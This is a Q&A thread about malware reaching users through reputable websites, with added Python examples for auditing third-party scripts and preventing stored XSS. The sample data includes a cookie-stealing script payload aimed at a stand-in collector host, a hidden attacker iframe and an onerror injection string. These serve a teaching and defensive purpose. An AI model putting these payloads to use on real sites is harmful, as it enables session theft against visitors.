Spyware from reputable websites?

3

I think I remember reading somewhere recently online that a surprisingly high percentage of spyware on computers is spread from reputable websites; you don't have to visit the Internet's "rough neighborhoods" to get infected. Is this true, and if so, where/how is this documented?

Mr. Jefferson

Posted 2012-08-07T15:22:32.720

Reputation: 682

Answers

4

Yes, it's a more common occurrence, and the only documentation I have is my antispyware logs showing rejects for malicious downloader attempts and HTML page source analysis on a VM that showed iframe injection code to exist on the site.

WordPress, if not properly maintained or secured, means you are at risk of going to reputable blog sites only to be sent over to some infection engine that does a pretty thorough scan of your system to profile it for the most likely exploit application.

Cross-site scripting is also employed, and the site you are on doesn't even have to be compromised or hacked for this to work.

Fiasco Labs

Posted 2012-08-07T15:22:32.720

Reputation: 6 368

2The site might be reputable, but that doesn't mean the adspace in the reputable site is – Chad Harrison – 2012-08-07T16:12:53.283

Very true, so you have several shots at being taken out: a compromised reputable site, a reputable site with an XSS vulnerability, or a reputable site hosting ads that get swapped for infectors. I've seen all the above in the last six months. – Fiasco Labs – 2012-08-07T16:54:12.360

I actually saw an injection method where JavaScript brought in the ASCII representation of VBScript, where the VBScript was later converted and invoked by the browser, coming from Brazil. This came from an ad on a reputable site (can't remember now). – Chad Harrison – 2012-08-07T17:35:44.293

4

The only documentation I read on this was by anti-malware or virus scanner companies. (Which should be the ones investigating this, but which also makes me doubt whatever they publish, as this is in their favour. As we Dutch say, 'We from WC-Eend recommend WC-Eend to .....'.)

However, there are at least three ways in which malware can get distributed by reputable websites:

  1. The website got compromised. It happens. Not often, but sometimes it happens. Usually because the website's software is not updated, or not updated fast enough. (A known exploit can be used on the day it gets known. So you would need to check mailing lists and update daily. Not everybody does that, which means there is usually a window of vulnerability.)
  2. The website runs scripts from other sites, e.g. ad banners. It includes these scripts from a remote location and has no control over them. Then the remote site gets hacked and the reputable site includes their code.
  3. Similar to point 2, but the ad server decides to change its code to its own advantage (e.g. the obscured JavaScript header which was served on LiveJournal for a while).

If you want to see if a site uses software from servers other than the website itself, try the RequestPolicy plugin for Firefox. It will give you some insight as to how often scripts and other sources get called from other websites.

Hennes

Posted 2012-08-07T15:22:32.720

Reputation: 60 739

I couldn't find anything in Google, could you give some back story on the LiveJournal incident? – Dan is Fiddling by Firelight – 2012-08-07T17:22:10.470

The LiveJournal incident is discussed on their tech support pages. They included JavaScript from a third-party website which was intended to be benign code. It did not spread malware. It did cause problems with a few accounts who suddenly got unexplained referrer problems. That drew attention. The problem turned out to be caused by some obfuscated code included from a third-party site (not even a local copy). Which means that site could have done anything. This was a year or two (?) ago. – Hennes – 2012-08-07T17:46:18.853

1 Found it! The full story is here: http://no-lj-ads.livejournal.com/87066.html – Hennes – 2012-08-07T20:02:10.197
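The third-party includes Hennes lists under points 2 and 3, and the injected iframe code Fiasco Labs describes finding in page source on a VM, are both visible in the static HTML of a page, which is what RequestPolicy surfaces at runtime. The script below is an added example and not code from any answer on this page: it parses a constructed sample page (the blog hostname, the ad-network script and the `203.0.113.7` iframe are all made up for illustration) and lists every script, iframe, object and embed whose host differs from the page's own, flagging zero-size or hidden iframes, which is the usual shape of an injected redirector to an exploit kit.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: one first-party script, one ad-network script
# pulled from another origin (as in Hennes's point 2/3), and a hidden
# iframe of the kind an attacker injects into a compromised WordPress
# template (Hennes's point 1). 203.0.113.7 is a documentation address.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="//ads.adnet.example/serve.js"></script>
</head><body>
<p>Post content</p>
<iframe src="http://203.0.113.7/in.php" width="0" height="0"
        style="display:none"></iframe>
</body></html>"""


class _SourceCollector(HTMLParser):
    """Collects every element that pulls executable content into the page."""

    LOADERS = ("script", "iframe", "object", "embed")

    def __init__(self):
        super().__init__()
        self.sources = []  # (tag, src, attribute dict)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or a.get("data")  # <object> uses data=
        if tag in self.LOADERS and src:
            self.sources.append((tag, src, a))


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def _looks_hidden(attrs):
    """Zero-size or display:none: the attacker does not want the victim to
    see the page the iframe loads."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


def third_party_sources(page_html, page_url):
    """Return the loaders whose host is not the page's own host.

    The comparison is an exact hostname match, so a first-party CDN on a
    subdomain is reported too; that is deliberate, you want to see every
    origin the page hands control to.
    """
    collector = _SourceCollector()
    collector.feed(page_html)
    page_host = _host(page_url)
    findings = []
    for tag, src, attrs in collector.sources:
        absolute = urljoin(page_url, src)   # resolves "/x.js" and "//host/x.js"
        host = _host(absolute)
        if host and host != page_host:
            findings.append({
                "tag": tag,
                "url": absolute,
                "host": host,
                "hidden": tag == "iframe" and _looks_hidden(attrs),
            })
    return findings


if __name__ == "__main__":
    for f in third_party_sources(SAMPLE_PAGE, "https://blog.example/2012/08/post"):
        flag = "  <-- hidden iframe" if f["hidden"] else ""
        print(f"{f['tag']:7} {f['host']:22} {f['url']}{flag}")
```

Run against a saved copy of a page (fetched from a VM, as Fiasco Labs did), this gives the same inventory RequestPolicy shows interactively; anything loaded from a bare IP address or a host you cannot account for is worth a closer look, and a hidden iframe pointing off-site is the classic sign of the injection both answers describe.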

-1

There is a wide class of application security vulnerabilities known as "stored cross-site scripting", which generally means that, when you visit a website (regardless of its repute), some code that was not designed by the website owner begins executing on your computer. 99.9999% of the time, the code that starts executing is JavaScript. The JavaScript can sometimes successfully trigger the execution of other code, such as Flash, Java applets, ActiveX, and so on. It can also cause popups, install malicious tracking cookies, and obtain things like your screen size, user agent string, the website you came from, and may even be able to set up Cross Frame Scripting, a related attack where you think you're interacting with the current website but are actually interacting with an attacker's website.

The reason why these attacks happen is that websites allow unvalidated input to be entered on the website, and then retrieved later for display. Sometimes this happens because of an insecure webserver, and sometimes they just don't do proper input validation.

This is extremely common on websites such as forums, message boards, and "Comments" sections of content management system (CMS) websites; basically, anywhere that users can enter their own data. Superuser, in fact, is one example of such a site.

There are ways to defend against and/or prevent these attacks, but they're extremely common. The Open Web Application Security Project says that Stored XSS is/was the #2 most dangerous application security flaw in 2010. It provides ways for website owners to attempt to test their website for these vulnerabilities using their tests, for example, here.

allquixotic

Posted 2012-08-07T15:22:32.720

Reputation: 32 256
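As an added example, not code from the answer above: a minimal comment renderer in the two forms allquixotic contrasts, the vulnerable one echoing stored user input straight into the page and the hardened one escaping each value at the point it enters the markup. The comment data, the author names and the `203.0.113.7` collector address are constructed for illustration. A small checker counts the `<script>` elements and `on*` event-handler attributes that actually reach the markup, which is the difference the browser cares about.

```python
import html
from html.parser import HTMLParser

# Constructed sample data standing in for a forum's comment table: two
# benign comments and one whose body carries a stored-XSS payload, plus an
# author name that breaks out of the <b> element with an event handler.
# 203.0.113.7 is a documentation address playing the attacker's collector.
PAYLOAD = '<script>new Image().src="http://203.0.113.7/c?"+document.cookie</script>'
COMMENTS = [
    {"author": "alice", "body": "Nice post, thanks."},
    {"author": "mallory", "body": "Great article! " + PAYLOAD},
    {"author": '"><img src=x onerror=alert(1)>', "body": "hi"},
]


def render_vulnerable(comments):
    """Retrieves stored user input and writes it into the page unchanged.
    This is the stored XSS bug: the attacker's markup becomes the page's."""
    return "<ul>" + "".join(
        f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in comments
    ) + "</ul>"


def render_hardened(comments):
    """Same template, but every untrusted value is HTML-escaped for the
    element-content context it lands in. quote=True also escapes quotes,
    so the same helper is safe if a value is later moved into a quoted
    attribute."""
    def esc(value):
        return html.escape(value, quote=True)
    return "<ul>" + "".join(
        f"<li><b>{esc(c['author'])}</b>: {esc(c['body'])}</li>" for c in comments
    ) + "</ul>"


class _ActiveContentFinder(HTMLParser):
    """Counts markup a browser would execute: <script> elements and
    on* handler attributes. Escaped text never reaches handle_starttag."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def active_content(rendered_html):
    finder = _ActiveContentFinder()
    finder.feed(rendered_html)
    return {"scripts": finder.scripts, "handlers": finder.handlers}


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render(COMMENTS)
        print(name, active_content(page))
        print("   ", page)
```

Escaping is context-specific: `html.escape` is the right tool for element content and quoted attribute values, but a value written inside a `<script>` block, into a URL, or into a CSS property needs the encoding for that context, and a real application should get this from a template engine with auto-escaping rather than from hand-written string formatting.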